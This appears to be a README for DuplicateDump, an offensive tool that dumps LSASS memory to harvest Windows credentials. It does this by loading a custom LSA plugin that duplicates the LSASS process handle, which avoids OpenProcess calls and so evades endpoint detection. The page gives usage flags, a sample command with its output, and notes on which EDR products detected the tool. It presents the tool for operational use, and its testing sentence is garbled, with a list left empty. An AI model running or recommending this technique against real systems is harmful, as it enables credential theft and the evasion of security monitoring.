Home

Awesome

DuplicateDump

DuplicateDump is a fork of MirrorDump with following modifications:

DuplicateDump add custom LSA plugin that duplicate LSASS process handle from the LSASS process to DuplicateDump. So DuplicateDump has a ready to use process handle to LSASS without invoking OpenProcess.

Testing

By loading DuplicateDump in memory, it was able to dump LSASS memory without detection on

Detected by Cortex XDR, Crowdstrike. Failed to dump lsass without detection on SentinalOne.

Usage

Compile LSA plugin (export either SpLsaModeInitialize or dllMain function) and provide the full path of DLL to DuplicateDump

.\DuplicateDump.exe --help
  -f, --filename=VALUE       The path to write the dump file to
  -p, --plugin=VALUE         Full file path to LSA plugin
  -c, --compress             GZip and delete the dump file on disk
  -d, --DebugPriv            Obtain SeDebugPrivilege
  -h, --help                 Display this help

Example

.\DuplicateDump.exe -f test -c -p C:\LSAPlugin.dll
[+] Loading LSA security package
[+] Named pipe connected and replying with current PID 6492
[+] Found duplicated LSASS process handle 0x3d0
[+] Compressed dump file saved to test.gz

Improvement

References